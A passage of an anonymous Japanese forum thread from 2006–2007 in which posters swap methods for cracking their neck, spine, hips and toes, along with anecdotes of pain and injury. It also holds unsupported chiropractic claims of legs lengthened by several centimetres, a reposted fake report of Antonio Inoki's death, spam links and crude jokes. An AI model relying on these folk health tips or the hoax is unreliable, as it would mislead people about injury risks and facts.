221 :名無しの愉しみ:2006/11/28(火) 23:20:24 ID:???
股関節は引っ掛かりが在る時しか鳴らないなぁ。
鳴ると引っ掛かりが取れて股関節の可動域が広がる。

222 :名無しの愉しみ:2006/11/29(水) 00:36:29 ID:???
ど、どうやって鳴らすの!?

223 :名無しの愉しみ:2006/11/29(水) 01:37:54 ID:KTw0uXHG
股関節すげー
僕の自慢ボキは鼻の軟骨
ペチッと鳴るペチッと
全身で一番ヒザが回復早くない?

224 :名無しの愉しみ:2006/11/29(水) 02:14:32 ID:qoHqd5Gg
股割りして左右一カ所ずつなるのは股関節じゃないの?簡単になるけど…

225 :名無しの愉しみ:2006/11/29(水) 07:21:27 ID:???
>>223
鼻のほうが股関節よりもよっぽど鳴りにくいだろうしすごいと思うが・・・w
つか鼻はやめといたほうがいいんじゃ?なんか歪みそうw

226 :名無しの愉しみ:2006/11/29(水) 08:56:23 ID:yQ3CWPVa
女子高生コンクリート詰め殺人事件
http://tmp6.2ch.net/test/read.cgi/youth/1164463866/

227 :名無しの愉しみ:2006/11/29(水) 12:45:04 ID:KTw0uXHG
>>225

右利きだからつい右手でばっかり鳴らしちゃいのよね


若干左に曲がってきた気が…

228 :名無しの愉しみ:2006/11/29(水) 15:44:26 ID:NlI+bzkJ
ここまで歪むなんてhttp://pink.gazo-ch.net/bbs/27/img/200512/550933.jpg

229 :名無しの愉しみ:2006/11/29(水) 16:08:14 ID:???
>>228
精神有害注意

230 :名無しの愉しみ:2006/11/29(水) 21:54:38 ID:???
拳の骨がよさげ。

231 :名無しの愉しみ:2006/11/30(木) 00:08:57 ID:+2vyAaav
ボキは関節の解放宣言だ

さあ高らかに

232 :名無しの愉しみ:2006/11/30(木) 05:35:38 ID:7EojlYSk
腰ボキとヘルニアは関係あるのか?

233 :名無しの愉しみ:2006/11/30(木) 09:54:16 ID:ws4+BD6a
腰ポキ続けて十数年。
腰椎分離症になったよ。腰ポキと関連あるかわからないけど。

234 :名無しの愉しみ:2006/11/30(木) 12:04:02 ID:+2vyAaav
二十年やってるけど全然平気
でもここで体に悪いいうのを初めて聞いたのでやや不安に

235 :名無しの愉しみ:2006/11/30(木) 22:37:56 ID:z7wiPb8R
>>231
一瞬「インターナショナル」を想像した。

236 :名無しの愉しみ:2006/12/01(金) 02:19:39 ID:dYbKpNX8
勢い良く首を鳴らした瞬間全身にビリッと電流が走った事が何回かある

血の気が引く

237 :名無しの愉しみ:2006/12/01(金) 03:37:15 ID:+8earxn7
一瞬気失うよな
ぁ〜怖い怖い。でも止められない

238 :名無しの愉しみ:2006/12/01(金) 16:00:07 ID:???
>>236
そういう話を聞いてもやめられないから
最近はせめてもと思い、ゆっくり曲げるようにしてる
バキッ、バキッ、バキッと一定間隔で鳴らす音もまた良し
でもやっぱりバキバキグシャァって連続で鳴らしたくなるんだよなぁ

239 :名無しの愉しみ:2006/12/02(土) 01:58:45 ID:NRh/2UIy
>>236
特に、座って鳴らすより立って鳴らしたほうが痺れるな。
絶対体に悪いとわかっていても…やめられん(;´Д`)

240 :名無しの愉しみ:2006/12/02(土) 02:01:47 ID:NRh/2UIy
本日(12/1)点灯。
ちなみに今シーズン初。
路面凍結のランプを見ると、冬なんだな〜と実感する。
http://up.nm78.com/old/data/up118814.jpg

241 :名無しの愉しみ:2006/12/02(土) 02:03:08 ID:NRh/2UIy
>>240
誤爆った_| ̄|○

242 :名無しの愉しみ:2006/12/02(土) 06:04:33 ID:???
>>241
せっかく来たんだから、ボキって行きなよ(´∀`)

243 :名無しの愉しみ:2006/12/02(土) 13:01:51 ID:???
こんなスレあったのか・・・。
俺も首をゴキャァ!っていわせるのがどうしてもやめられない。
異常な音らしくて 首折れた?ってたまにいわれる。

そんな俺は首ゴキしすぎて2・3回アゴ痛めた。
それでもやめられない!もはや麻薬。
またいつアゴをやっちまうか心配でしょうがない。

244 :名無しの愉しみ:2006/12/02(土) 21:12:16 ID:???
膝がキモチイイ!
膝を曲げて、(両)手で膝の皿の下端を押さえて、膝を伸ばすとパキッていく。

245 :名無しの愉しみ:2006/12/02(土) 23:02:52 ID:ysEasNop
>>243

首ゴキして傷めるのがなぜかアゴっちゅうのがおもろい

>>244

そのボキ法うまくできなかった
僕はヒザはひねりボキ専門

246 :名無しの愉しみ:2006/12/03(日) 03:15:36 ID:???
関節がポキポキと鳴る理由
http://hand.raindrop.jp/column051231.html

247 :名無しの愉しみ:2006/12/03(日) 14:50:48 ID:???
>>246
散々既出の、しかも仮説の一つでしかないそれを
今更貼られてもね

248 :名無しの愉しみ:2006/12/03(日) 18:10:09 ID:???
>>147
いつの間にやら2つ増えてるw


で、これローカルに保存できないの?

249 :名無しの愉しみ:2006/12/04(月) 00:55:16 ID:YzkvnhEQ
新たなボキを追い求め
未開の関節ぐぐぐと曲げる

ジス・イズ・Theフロンティアスピリッツ
今の僕にはもうありません
若き日は遠くになりにけり

250 :名無しの愉しみ:2006/12/04(月) 05:52:13 ID:F5yw9Uhf
>>249
全身の関節くまなく鳴らせるって事なのか?

(;゚∀゚)'`ァ'`ァ

251 :名無しの愉しみ:2006/12/04(月) 05:54:19 ID:F5yw9Uhf
いや、ボキに飽きたって事か。

252 :名無しの愉しみ:2006/12/04(月) 08:56:02 ID:YzkvnhEQ
>>250
現状で満足
昔は痛いのこらえてあちこちぐいぐいやってたけど
おっさんになった

253 :名無しの愉しみ:2006/12/04(月) 21:28:55 ID:???
大きい(重い)音が一発ゴキッって鳴るより
小さい音がいっぱいグシャグシャって鳴るほうがキモチイイ(*´∀`)

254 :名無しの愉しみ:2006/12/04(月) 22:14:43 ID:???
>>253
それわかる!寝起き背中ねじってバキバキバキバキバキ…ってなったら一日幸せw

255 :名無しの愉しみ:2006/12/05(火) 00:31:21 ID:???
>>254
寝起き直後はそんなに鳴らない気がする。
寝起きから1時間位して、ボキするの忘れた頃に( ゚д゚)ハッ!と思い出したときにやると…。

ボキィィイッ!!
グシャッッ!!

と鳴って痺れるくらいの快感(*´д`)

256 :名無しの愉しみ:2006/12/05(火) 01:32:56 ID:LNv/8ajT
寝起きも鳴らすけど自分は寝ながらも鳴らしてるらしい

257 :名無しの愉しみ:2006/12/05(火) 02:08:34 ID:ZDuGpieg
僕は寝ながらだと、足の指を交差させて人差し指をポキッと鳴らす。
最近は寝たまま左膝を軽く捻ると、ボキッと鳴るようになったな。
さらに、寝たまま海老反りすると背骨がパキパキッと鳴る。

258 :名無しの愉しみ:2006/12/06(水) 17:50:41 ID:zFT9K1ST
昨日、失敗鳴らしをしてしまったので今日首がギスギスいってる…

259 :名無しの愉しみ:2006/12/06(水) 17:55:39 ID:WUfwFDLB
俺なんか肩の骨をゴリゴリならしてたら、肩幅だけ広くなったんだけど。
アンバランスな体になった。キノコみたいに。
小学校からよくやってたから骨が成長したみたいだ

260 :名無しの愉しみ:2006/12/06(水) 19:50:23 ID:???
>>259
漏れなんて足の指を一本一本根元からグッとつかんで
引っ張りながら曲げる感じで思いっきり鳴らしまくってたら
足指伸びて長くなったぞw 特に人差し指。超長くなっちまってETキノコみたいでキモイw
でもやめない。

261 :名無しの愉しみ:2006/12/06(水) 21:42:36 ID:TWVLSCUO
指鳴らすのって最初の頃は痛くなかった?
いつの間にか癖に・・・
ってか膝と肘が、体重をかけて曲げた後伸ばすとほぼ100%鳴るようになってやばい・・・
(膝なら屈伸、肘なら腕立て)
ここは一回も自主的に鳴らしたこと無いのに・・・


262 :名無しの愉しみ:2006/12/06(水) 22:06:19 ID:???
>>261
俺は最初、友達に「痛いけど気持ちいいよ」と言われてやった。
痛気持ちいいってのは日本人の好みなのかもな。

263 :名無しの愉しみ:2006/12/07(木) 01:05:47 ID:???
最初、痛いけど気持ちいいのは、女の子のセックルと一緒だなw

264 :名無しの愉しみ:2006/12/07(木) 01:21:36 ID:???
じゃあ俺は毎日セックスしてるわけか…
なんか脱童貞した気分だ…

265 :名無しの愉しみ:2006/12/07(木) 01:48:53 ID:1dV0dbkN


@「硬い枕」などを地面に置く

      ↓
      ■
地面==========





A 枕に背を向けて地面に座る


       ○
      ■ヒ∧
地面==========






B勢いをつけて仰向けに反る

      ☆ボキグシャ
      〃
     ○⌒\
      ■
地面==========


266 :名無しの愉しみ:2006/12/07(木) 16:14:24 ID:KNBUNlTX
固い枕がない!なにかで代用できないかな

267 :名無しの愉しみ:2006/12/07(木) 23:05:25 ID:HekRhSKB

@ 背もたれの高さが、ちょうど肩甲骨の下に来るような
  丈夫な椅子に腰掛ける。(キャスター付きや座回転式は×)

         ○
        ■ヒ
        ■■>
   地面==========

A タウンページを2冊ほど両手に持ち、両足を
  椅子の脚に絡ませて固定する。(←固定は重要)

         ○
        ■ヒ‖
        ■■>
   地面==========


B そのまま両手を頭上から後ろへ。


        ☆ボキグシャ
        〃
       ○⌒\
       ‖■
        ■■
   地面==========
 

268 :名無しの愉しみ:2006/12/07(木) 23:27:11 ID:???
>>265
>>267
Bの後両手を腹筋するときのように後頭部に回し、背骨を固定しつつ頭を持ち上げる

そうするとバキバキッグシャッ!!!

最高にキモチイイよ

269 :名無しの愉しみ:2006/12/08(金) 02:01:27 ID:???
しかし、よくAA化するねw

270 :名無しの愉しみ:2006/12/08(金) 02:23:37 ID:6tp3X0+e
最近ならしてくれやん整体院多いな!ソフトとかゆって…
あほらし
鳴らすためにいってんだろーが

和歌山に鳴らしてくれる整体院や整骨院ないかな?

271 :名無しの愉しみ:2006/12/08(金) 04:29:00 ID:oc53I1J4
大阪まで出れば?

272 :名無しの愉しみ:2006/12/08(金) 04:53:19 ID:eL3+N7Si
昔ピッコロさんを真似して首のバキバキを習得した
いまでも利用してる


273 :名無しの愉しみ:2006/12/08(金) 23:27:45 ID:biou8AuA
>>267
学校のイスでよくやる!
最近は周りの女子が引き始めたから控えてたけど。
思いっきり反らして腕を横に広げると剣状突起が鳴るような気がしない?

274 :名無しの愉しみ:2006/12/09(土) 12:46:24 ID:???
そんなトコも鳴るのか。
骨鳴らすってのは奥が深い。

275 :名無しの愉しみ:2006/12/10(日) 12:16:16 ID:bq3OE+lx
このスレでは背骨鳴らしは常識だよ
首腰背中は鳴らしがいあり!

276 :名無しの愉しみ:2006/12/10(日) 13:18:10 ID:???
基本部分は
首 腰 背骨 手足の指
だな

寝起き一番の腰ボキはマジ快感

277 :名無しの愉しみ:2006/12/10(日) 14:24:24 ID:???
>>275
剣状突起は背骨じゃないだろ。。。


278 :名無しの愉しみ:2006/12/10(日) 14:27:35 ID:vClCMenQ
無料携帯サイトモバゲーって、おもしろいよ!携帯版のハンゲームというか…
登録も簡単でいつでもやめれるから見てみて〜
http://mbga.jp/AFmbb.Y0lQ16446e/

279 :名無しの愉しみ:2006/12/10(日) 15:46:38 ID:???
>>278
そんなんより骨鳴らしたほうがおもしろい。

280 :名無しの愉しみ:2006/12/10(日) 19:14:04 ID:???
>>278
お前もそんなのやらないで骨鳴らしてみ
ゲームより快感だから

281 :名無しの愉しみ:2006/12/10(日) 19:47:27 ID:???
1・まず正面を向く

2・首だけを動かして右を向く

3・そのまま左顎を手で押す

4・コキコキコキコキコキ!!5回鳴るお
運がよければ6回鳴る

282 :名無しの愉しみ:2006/12/11(月) 22:55:42 ID:IF5s6Ren
子供のころ肋骨(胸)の真ん中をぐいと押したら一発バキっと鳴ったことがある…
気がする
いや確かに鳴ってすごく痛かった記憶はあるんだけど、有り得ない場所よね…

283 :名無しの愉しみ:2006/12/13(水) 00:29:59 ID:HkuA7A92
股関節鳴らす人結構いるんだな、さすがポキラーだぜ
俺は最近足の親指を外側に傾けて鳴らすのにはまってる
鳴るまでの粘りと、鳴った時の重厚な音がたまらん


284 :名無しの愉しみ:2006/12/13(水) 05:34:21 ID:???
股関節なるためのコツかなんかある?

285 :名無しの愉しみ:2006/12/13(水) 11:06:37 ID:ZES6k95B
>270
アジャストメント、矯正を練習しても習得出来なかった下手な奴が
「痛くない。」「ソフト整体カイロ」などと言ってるのです。
やって欲しくない患者にはしなければよい話しなのに下手クソな
奴ほど「あれは危ない。」」などと言います。
早い話し「出来ません。」と言えばいいのですが、違う理論で言い訳、インチキ施術を
してるのです。
頚椎脊椎骨盤ぐらいのアジャストは出来なければただのいんちき整体もぐりマッサージです。
アメリカではディバーシファイドと言ってベーシックなテクニックです。
約90%ぐらいのカイロプラクターは必要に応じて使いこなすようです。


286 :名無しの愉しみ:2006/12/13(水) 20:16:50 ID:S2YcANN5
固くて高い枕で寝ると、
翌朝首の骨が大量に鳴る(*´∀`)


287 :キコウ:2006/12/13(水) 20:19:52 ID:o50/j19i
足の親指を手を使わないでならせるんだが…周りに誰もそんなヤツいないんだ。
自分だけって何か足の指がへんじゃないか不安だ。
ここに↑できるヤツどんくらいいる?


288 :名無しの愉しみ:2006/12/13(水) 20:36:56 ID:???
>>287
右足で左足の指を鳴らすとか床に押し付けてとかだったらできる
空中でその足の力だけで鳴らすのは無理かな

289 :名無しの愉しみ:2006/12/13(水) 20:40:38 ID:???
柔道やってて怪我ばっかしてたせいか、右手を普通にグーにするだけでバキバキ無限になるんだけど、直るかな?

290 :キコウ:2006/12/13(水) 21:57:55 ID:o50/j19i
>>288そうか…。
足の骨がヤバイかも。
ところで俺は肩こりなせいか肩も少し回すだけで無限になるんだが…これは皆なるよな!?


291 :名無しの愉しみ:2006/12/13(水) 21:59:05 ID:ECydRDZ1
なおさなくてよし!

292 :名無しの愉しみ:2006/12/13(水) 23:56:29 ID:HkuA7A92
一度鳴り始めた箇所はもう治らない


293 :名無しの愉しみ:2006/12/14(木) 00:03:43 ID:???
>>292
鳴り始めなければ負けかと思っている

294 :名無しの愉しみ:2006/12/14(木) 00:38:17 ID:???
>>290
あ、言い忘れたけど足首なら足の力だけで回して鳴らせる
あと首が常に回したらコココココって感じで鳴るわ
一日で一番鳴らす場所は手首(右ひねり、左ひねりどっちも)だし
自分はひねったり回転させたりするので鳴りやすいっぽい

295 :名無しの愉しみ:2006/12/14(木) 01:33:57 ID:???
初めてここに書き込ませてもらいます。
こんなの見つけました。

http://www.youtube.com/watch?v=ALNu4Anqb0s&mode=related&search=

296 :名無しの愉しみ:2006/12/14(木) 01:43:06 ID:???
これも
http://www.youtube.com/watch?v=nr860SoPilU

297 :名無しの愉しみ:2006/12/14(木) 03:06:21 ID:???
>>295
GJ

298 :名無しの愉しみ:2006/12/14(木) 10:23:34 ID:???
おお、鳴りよる鳴りよるw

299 :名無しの愉しみ:2006/12/14(木) 17:52:02 ID:???
ttp://www.musashikoyama.com/town/shop_bee_chanpuru.html

> 先生に
> 「首を鳴らしますか?」って言われて即答しました。

「鳴らさないで」などと答えられるものかね?

300 :名無しの愉しみ:2006/12/15(金) 01:03:12 ID:???
>>290
自分もできますよ。
人差し指と一緒に足の指で空気を握るように
やると無限に鳴ります。
痛みや気持ちよさは全くないですが。。

301 :名無しの愉しみ:2006/12/15(金) 11:59:57 ID:???
初めまして。股関節を鳴らしてみたいのですが、どうすれば一番鳴りやすいですか?私は指、手首、ひじ、首、背中、腰、膝、足首、足の指が今レギュラーで鳴らす所なんですが、他に鳴る所ありますか?あれば詳しく教えて下さい。よろしくお願いします。ゴキ

302 :名無しの愉しみ:2006/12/15(金) 13:14:42 ID:???
自分、体操座りしてそのままお尻だけで体を支えるようにすると腰がゴキっていう。
スポーツヘルニアなんだけどなんか関係あるのかな。

303 :キコウ:2006/12/15(金) 21:24:26 ID:fUlShSVX
>>300同志だ!
人指し指は使わんでもできるが…(笑)
自分も気持ち良い感覚も痛みも無い(笑)
多分日本に俺らと同じ事できるヤツ4桁いねーぜ!
レアだレア!

304 :名無しの愉しみ:2006/12/16(土) 00:07:35 ID:???
>>303自分も鳴ります。数年前から小指も鳴り始めたんだが…

305 :名無しの愉しみ:2006/12/16(土) 03:13:58 ID:Yi0Bcs6K
>303
私も鳴りますよ
両足親指だけですが…
そのせいか、親指だけ
関節太くて外側に変形してます

306 :名無しの愉しみ:2006/12/16(土) 13:34:24 ID:???
指興味ねーw

307 :名無しの愉しみ:2006/12/17(日) 03:08:14 ID:???
手首鳴らしすぎて関節が熱持ってる
今日も100回ぐらい鳴らしたかな

308 :名無しの愉しみ:2006/12/17(日) 06:02:12 ID:s+fENhhW
曲げる
捻る
引っ張る
ヘシ折る
鳴らし方は無限大

309 :名無しの愉しみ:2006/12/17(日) 16:04:56 ID:KEkqOQar
手の指、両手組み合わせて反らせるといい音が鳴る。
でも、ゲンコツ押さえても指引っ張っても鳴らない。

310 :名無しの愉しみ:2006/12/18(月) 23:23:03 ID:???
個人的な股関節の鳴らし方
片足で立ってもう片方の足をまっすぐ伸ばしたまま後ろに上げて上体を前に倒す
また割りとかでもなるけどこの方法で鳴らすと音が大きいし鳴らしやすい
ものすごく異様なポーズだけど・・・家では普通にやってたり

てきとうな落書き
ttp://up.spawn.jp/file/up59458.bmp

311 :名無しの愉しみ:2006/12/19(火) 00:10:42 ID:???
股関節が鳴った事の無い俺は
人生の8割ぐらい損してる予感。

312 :名無しの愉しみ:2006/12/19(火) 00:33:19 ID:???
>>310
確かにそのポーズだなw
オレは家でちょっと遠くの物を取る時や、服をハンガーにかけるときなんかその体系になる
股関節の音って他の骨に比べて凄い鮮明に聞こえるよね

313 :名無しの愉しみ:2006/12/19(火) 01:58:10 ID:???
>>302
私はそれ、寝る前によくやります。もう五年くらい。

私はヘルニアとは診断されていませんが、最近腰を反らすと痛い…
私もヘルニアデビュー?w

314 :名無しの愉しみ:2006/12/19(火) 02:39:32 ID:Yb3bOOB/
>>296
こいつは俺かww

315 :名無しの愉しみ:2006/12/19(火) 03:20:03 ID:???
股関節は股割りがいいよ〜
なんといっても左右一気に鳴ることだね
ゴキィッゴキィッ

316 :名無しの愉しみ:2006/12/19(火) 08:53:29 ID:???
右手を握るだけで一本一本がぽきぽきなるのは快感

317 :名無しの愉しみ:2006/12/19(火) 10:02:01 ID:???
スクワットする度にひざがポキポキ鳴る。チョト痛い

318 :名無しの愉しみ:2006/12/20(水) 05:29:27 ID:???
なんで首ってこんなに気持ちいいんだろうねハアハア
オナヌよりきもちー

319 :名無しの愉しみ:2006/12/20(水) 10:57:12 ID:???
最近は首より、背骨を鳴らすことにハマッテいる俺ガイル。

320 :名無しの愉しみ:2006/12/21(木) 06:51:54 ID:???
>>303
俺もなるぜ

321 :名無しの愉しみ:2006/12/23(土) 12:33:49 ID:APfmvlL0
肩 鼻 股関節(2箇所) 足の甲 顎(左側だけ)がまだ鳴りますよ


322 :名無しの愉しみ:2006/12/24(日) 00:29:50 ID:???
昔は首、腰がバキバキ鳴っていたのだが、最近鳴らなくなった。
30後半、関節液が減ってきたのかwww
代わりに最近バキってるのが膝。
普通に立ったり座ったりしても膝関節は頻繁に鳴るが、ポキッとあまり大きく鳴らない。
で、立ったまま、膝関節を逆方向にグッと力を入れる。突っ張らせる感じ。
すると、ゴバキッ!っと大きく鳴ってくれる。うーん、快感www

323 :名無しの愉しみ:2006/12/24(日) 09:18:41 ID:???
http://onisci.com/105.html

324 :名無しの愉しみ:2006/12/24(日) 14:47:45 ID:???
携帯からで失礼します
ヨガのポーズで足を頭の後ろで組むポーズわかります?
あんな感じで足で頭を挟んで引っ張ると首が「ゴクゴクゴキッ」って鳴るよー
あー体が軟らかくないとキツイので無理しないで下さいねー

325 :名無しの愉しみ:2006/12/24(日) 16:12:47 ID:LKNUK4FT
骨折って死ね

326 :名無しの愉しみ:2006/12/24(日) 22:01:59 ID:???
まあ、>>325のように骨がなっていると勘違いしている人もまだまだ多いよね

327 :名無しの愉しみ:2006/12/25(月) 12:58:36 ID:???
体がめっちゃ硬くて、>>324はおろか>>310すら出来ないorz

328 :名無しの愉しみ :2006/12/25(月) 13:49:12 ID:???
左腕の肘関節にグっと力入れると音が鳴る。

329 :名無しの愉しみ:2006/12/26(火) 13:47:13 ID:XCqF2WkS
>>323読むと体育の準備運動の時間に背骨鳴らしがあったなんて…ウラヤマ

330 :名無しの愉しみ:2006/12/27(水) 03:37:32 ID:???
某有名カイロでは自分がやったりやってもらうことばかりだった。
唯一首のボキ方法は素人には出来ないようかやり方でした。

別の個人経営のところではアームロック(肩の肘の為)、両エビ固め(骨盤、足の柔軟)、軽いドラゴンスクリュー(足首と膝の為)みたいなのをやられた。イタキモチヨスギ
ボキボキフルコースでと言うとお互い楽しそうにするからここ以外いけない!
足首、膝、骨盤はきちんと矯正すれば最低2cmは足が長くなると言われ、5cm伸びた人もいて人生変わったと大喜びした人もいるらしいです。
しかし最近はソフト整体メインばかりでボキラーとしては残念だね。

331 :名無しの愉しみ:2006/12/27(水) 05:15:23 ID:???
ボキラー最高!!

332 :名無しの愉しみ:2006/12/27(水) 14:34:31 ID:???
>>287
地面をつければ、親指だけならできる。

333 :332:2006/12/27(水) 14:36:14 ID:???
>>290
あ、今やってみたら足「だけ」でできた。

334 :名無しの愉しみ:2006/12/27(水) 14:54:41 ID:r/2GN2u9
>>287
キコウさん、おいらも両足の親指なら自力で鳴らすことが出来ますた。
しかし右の親指をある日しつこくゴリゴリ動かして鳴らそうとしたら・・・。
パキっと鳴った瞬間ものすごい激痛が!
1分くらい続いた痛み。後日恐る恐る鳴らそうとしたらやはり同様の痛みが><

それ以来右の足の親指だけは手や床に押し付けて鳴らすようになりますたorz

335 :名無しの愉しみ:2006/12/28(木) 22:26:47 ID:F/EmRK80
左半身がやたらボキボキ鳴るよw
左肩は無限になるし首も30分に1〜2回は鳴る、左肘は小学生の時に亜脱臼したせいで直らん(故に曲げる度に鳴る)
腰、背中、首も肉体労働なんでアホみたいに鳴る、指も無限に鳴る。
ポキポキオナニーしすぎで歳取ったら神経圧迫で死ぬだろうなw

336 :名無しの愉しみ:2006/12/29(金) 11:10:15 ID:OuaCfEhV
みなさんどんな場所でバキボキするのが好きですか?
自分はしーんとした図書館です。
人のいないところに行って、本の棚につかまって腰をゴキゴキッw

337 :名無しの愉しみ:2006/12/29(金) 17:26:50 ID:KUc3mlAx
せっかくシ〜ンとした図書館にいるのになぜわざわざ人のいないとこにいって鳴らすんだ?

シ〜ンとした中で周りが静かに勉強してる時におもいっきしボキゴキッグシャグシャグシャグシャ!

338 :名無しの愉しみ:2006/12/29(金) 20:24:09 ID:CMBnVa5F
>>287
俺は小三から13年間ならし続けてるがまったく問題なし。休みなしに永遠になるぞ

339 :名無しの愉しみ:2006/12/31(日) 03:43:17 ID:VUAhyD6b
一分に一回は首鳴らすよ

340 :名無しの愉しみ:2006/12/31(日) 09:57:47 ID:???
バカなスレだな

341 :名無しの愉しみ:2006/12/31(日) 15:31:10 ID:???
俺は1日10回ぐらい首&背骨ボキボキ

342 :名無しの愉しみ:2006/12/31(日) 21:02:28 ID:hx90to0n
みんなで鳴らすぞ!百八つ!

343 :名無しの愉しみ:2007/01/01(月) 02:41:01 ID:???
とうとう新年迎えたか…

今年もボキボキバキバキグシャァゴシャァー!!!!!!!!!!

344 : 【314円】 【大吉】 :2007/01/01(月) 09:13:34 ID:???
初ボキバキ

345 :名無しの愉しみ:2007/01/01(月) 12:23:04 ID:???
新春バキボキ

346 :名無しの愉しみ:2007/01/03(水) 00:30:06 ID:fm2CY+Rk
age

347 :名無しの愉しみ:2007/01/03(水) 21:24:44 ID:4/buRDbj
センター試験の静かな雰囲気の中で鳴らして
甲高い音を出したことがある。気持ちよかったー

348 :名無しの愉しみ:2007/01/04(木) 00:10:12 ID:???
そーいうところで鳴らせば、かならず周囲から
「ペキ」「ポキ」と返事が返ってくる

349 :名無しの愉しみ:2007/01/04(木) 12:05:06 ID:???
他人が鳴らした音を聞くと自分も鳴らしたくなるのがこの世の理

350 :名無しの愉しみ:2007/01/04(木) 15:17:37 ID:Qm5ikSwn
このスレは若い奴がおおいのか?

351 :名無しの愉しみ:2007/01/04(木) 16:08:00 ID:0dFumVzj
当方31
よほど苦労してきたみたいな節ばった手をしております
押忍ボキ

352 :名無しの愉しみ:2007/01/04(木) 20:01:29 ID:???
>>349
同じ部屋で寝てる人が足の指を鳴らしたときに
特に鳴らしたくなる。

353 :_:2007/01/04(木) 22:36:53 ID:???
他の人がポキポキ鳴らしてんの見てポキポキしたくなるってのは分からんわー
むしろ、おいおいそんな所ポキポキやって大丈夫かよって思っちゃうくらいだ。 最近、個人的にお気に入りの場所は足の親指の第一関節。鳴らす時は先に隣の人差し指とかをポキポキッてやると鳴りやすいことを最近知った。ところで足の指も人差し指って言うの?

354 :名無しの愉しみ:2007/01/04(木) 22:59:45 ID:???
言うんじゃない?
足の小指も小指って言うし。

355 :名無しの愉しみ:2007/01/05(金) 01:07:49 ID:5+5FwiuG
>ところで足の指も人差し指って言うの?

正確には言わない。
でも俗称だから言っても問題無い。
実際、誰にでも通じるし。

356 :名無しの愉しみ:2007/01/05(金) 12:16:17 ID:???
解り難くてスマンが俺の背骨鳴らしを晒す。
同じ方法でやってる奴いないだろうか?

椅子の背もたれの位置が自分の背骨の半分くらいの高さの椅子を用意する(学校の椅子とか安いOAチェアー)。
頭の後ろで手を組んで肘を前にする。二人組で背骨を鳴らすあのフォームを取る。
で、椅子の背もたれの上部に自分の背骨の真ん中辺りを引っ掛ける(乗せる)様に座る。
自分の足を前方に伸ばし、机の脚などに絡ませガッチリ固定。コレを怠るとひっくり返る可能性大。

そして、至福の瞬間。
背もたれの部分で背骨下半分を固定した状態で上半分を反らす。
頭は反らさず組んだ両手で下方向にぐいっと引く。

イメージ的には背もたれの部分の背骨を支点に、首を力点にテコの原理で背骨上部を鳴らす感じ。
解り難くてごめん。

成功すれば体の奥の奥から弾けるような『ボキボキボキィッ!』が内臓を伝わり15秒ほどエクスタシーを味わえます。
この鳴らし方に比べると体を捻る事によるボキボキは刺激が足らなくなってしまうのです。



357 :名無しの愉しみ:2007/01/06(土) 02:59:40 ID:???
15秒もエクスタシー味わえたらセックスいらねーな。

358 :名無しの愉しみ:2007/01/06(土) 12:58:32 ID:OmYR9tR0
今日、朝起きて速首をならす!
「ボゴ!」
嫌な音がなった…
く、首がぁ〜!
痛くて痛くて…
首は右には曲がるが
左が痛くて曲がれない…
やはり接骨院へ行った方がいいですか?

359 :名無しの愉しみ:2007/01/06(土) 13:20:45 ID:???
>>358
鳴らして痛くなったのなら早急に行くべきでは

360 :名無しの愉しみ:2007/01/06(土) 17:28:47 ID:2YQ99kff
>>358
寝違えたのだろ

361 :名無しの愉しみ:2007/01/06(土) 19:02:23 ID:qo8Me+IK
指ポキしすぎて指輪のサイズに困るようになってきた…ポキやめても太さは変わらないよね…。
でもとりあえず手の指ポキは控えて、股関節とか肩でガマンする。

362 :名無しの愉しみ:2007/01/06(土) 21:44:35 ID:b+wWiieU
小学生のとき手の甲を上にしてほおづえ付いてたら
手首の関節が「ボクッ」ってかんじで思いっきり鳴ったことがある。
その後何度か試してもあんなに派手に鳴ることはない。
そのときは手首の可動域がおもいっきりひろがってたな

363 :名無しの愉しみ:2007/01/07(日) 01:39:51 ID:dqZbrkqw
>>356
それ、俺もやる。
気持ち良いよな。

364 :名無しの愉しみ:2007/01/07(日) 01:54:09 ID:1GctkEFW
貴方は呪われました。
これを解除するには
菜食について考える part9
http://academy4.2ch.net/test/read.cgi/philo/1167715721/

ここに虫に聞け氏ねと書きこむしかありません…

365 :名無しの愉しみ:2007/01/07(日) 01:56:30 ID:???
おれも、おれも。

366 :あぼーん:あぼーん
あぼーん

367 :名無しの愉しみ:2007/01/07(日) 03:01:49 ID:???
>>356
俺以外にもこのやり方でポキってるやついたんだw
背骨がぐぐーってしなって「ポキィッ!」て弾けるように鳴るの気持ちいいよなw

368 :名無しの愉しみ:2007/01/07(日) 03:28:33 ID:???
こんなスレあったんだ

鳴らし過ぎなのか知らないが関節がふにゃふにゃになった
手首は90度以上曲がるし手なんかは押したらぺったんこになる
指はもういくら押しても鳴らなくなった

369 :名無しの愉しみ:2007/01/07(日) 03:36:33 ID:???
俺体操やってて軟体人間だからボキボキ鳴らないんだけど

370 :名無しの愉しみ:2007/01/07(日) 13:35:59 ID:XrQdy/lf
親指だけは怖くて鳴らせない…

371 :名無しの愉しみ:2007/01/07(日) 14:56:55 ID:ZK+p3rhd
俺…手の甲のほうの人差し指の上にある細い骨自由に動かせるんだけど同じやついない?

372 :名無しの愉しみ:2007/01/07(日) 16:27:33 ID:???
鳴らしすぎて、左の親指を曲げると痛くて曲がらなくなりました。
どうしましょ

373 :名無しの愉しみ:2007/01/08(月) 20:28:00 ID:E4vWEhQi
フジテレビ!

374 :名無しの愉しみ:2007/01/08(月) 20:29:42 ID:???
なんか女子アナがボキボキ整体されてる!!!!

375 :名無しの愉しみ:2007/01/08(月) 21:17:02 ID:ePQApTYU
【速報】アントニオ猪木が死去
http://sports9.2ch.net/test/read.cgi/wres/1168222328/l50

1 :お前名無しだろ :2007/01/08(月) 11:12:08 ID:oUyIIXsy0
死因は脳血管疾患で昨夜、都内病院でお亡くなりになったそうです。
不滅の闘魂、アントニオ猪木。
多くの夢と感動をありがとう。

ご冥福をお祈り申し上げます。

38 :1:2007/01/08(月) 14:18:50 ID:oUyIIXsy0
俺も人から聞いただけなんだ。俺は知らない。
一寸先は闇、なんてな。ムフフフフ。
ダー!

376 :名無しの愉しみ:2007/01/08(月) 22:47:58 ID:???
>>374
見てない!どんな内容だったの?音も聞こえた?

377 :名無しの愉しみ:2007/01/08(月) 23:18:45 ID:o/l6Ns+z
>>375
またいつもの「騙されて〜」か

378 :名無しの愉しみ:2007/01/08(月) 23:40:32 ID:???
>>376
音もちゃんと聞こえたんだぜ

「草薙・おすぎとピーコの女子アナ2007もっと大人になりたいのっ!SP」
っていう番組の一部分でやっていた。

女子アナ(名前忘れた…)が「関節を鳴らしたい」ということで
ある整体にいきボキボキしてもらった、という内容。

説明不足でスマソ…



379 :名無しの愉しみ:2007/01/09(火) 01:56:27 ID:wbAxBFAX
